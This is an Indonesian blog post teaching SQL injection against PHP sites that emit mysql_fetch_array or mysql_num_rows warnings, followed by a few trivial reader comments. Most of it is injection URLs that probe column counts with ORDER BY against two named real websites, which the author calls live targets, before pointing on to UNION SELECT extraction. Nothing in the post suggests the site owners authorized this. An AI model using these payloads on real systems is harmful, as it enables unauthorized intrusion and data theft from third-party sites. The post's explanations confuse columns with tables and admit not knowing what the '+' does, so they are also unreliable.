Pernahkah anda saat melakukan / mencari target SQL injection, tapi ketika diberi string tanda petik satu ( ' ) itu pesan error nya yang muncul tidak seperti biasanya ? alias tidak sama dengan pesan Syntax error.
malah muncul pesan errornya begini :
1. Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/cxpqublo/public_html/news_view.php on line 29
jangan khawatir, itu bisa kamu inject kok :) ..
http://www.kidstoryhouse.com.tw/news_view.php?id=10'
string order by :
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+1-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+2-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+3-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+4-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+5-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+6-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+7-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+8-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+9-- ( gak ada respon )
http://www.kidstoryhouse.com.tw/news_view.php?id=10+order+by+10-- ( malah muncul pesan error )
Nah kalau muncul pesan errornya di 10 , berarti column count normalnya 9. kenapa begitu karena itu menunjukkan kalo di tabel 10 muncul pesan error karena tidak ada tabel 10 . jadinya muncul pesan error.
lalu kamu lanjut saja ke UNION SELECT seperti biasa.
ada lagi yaitu ketika kita masukan tanda petik satu ( ' ) yang muncul pesan errornya begini :
2. Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/citcoweb/public_html/news_view.php on line 36
disini saya mempunyai satu live target yang kebetulan pesan error nya begitu .
http://www.citcochandigarh.com/news_view.php?id=4'
string order by :
http://www.citcochandigarh.com/news_view.php?id=4+order+by+1-- ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4+order+by+2-- ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4+order+by+3-- ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4+order+by+4-- ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4+order+by+5-- ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4+order+by+100-- ( gak ada respon )
pertanyaan nya , kenapa kok sampai 100 juga tidak ada apa apa ? terus apa yang harus di modifikasi ?
ini jawabannya :
string order by :
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+1--+ ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+2--+ ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+3--+ ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+4--+ ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+5--+ ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+6--+ ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+7--+ ( gak ada respon )
http://www.citcochandigarh.com/news_view.php?id=4'+order+by+8--+ ( muncul pesan error )
keterangan :
pada order by ke 8 itu muncul pesan error, karena tidak ada tabel ke 8 , berarti itu web column count normalnya 8..
terus tanda petik satu ( ' ) sesudah angka 4 kok masih nyantol ? itu karena untuk mengetahui / memunculkan pesan error ketika tabel tidak ada , jadi intinya itu web tabelnya sampai 7. dan untuk tanda + untuk apa saya kurang tahu hehehe.. intinya jangan lupakan itu.
lanjut ke UNION SELECT seperti biasa, tapi jangan hilangkan tanda petik satu ( ' ) dan tanda plus ( + ) biarkan itu nyantol disitu hehehe.
Udah segitu ajah dulu yah kawan. dilanjut sama posting berikutnya.
By : Ahmad fathony
Hadir gan...
ReplyDeletepelajari om ..
ReplyDeleteizin Menyimak Om, mohon kunbalnya Jelly Gamat QNC
ReplyDelete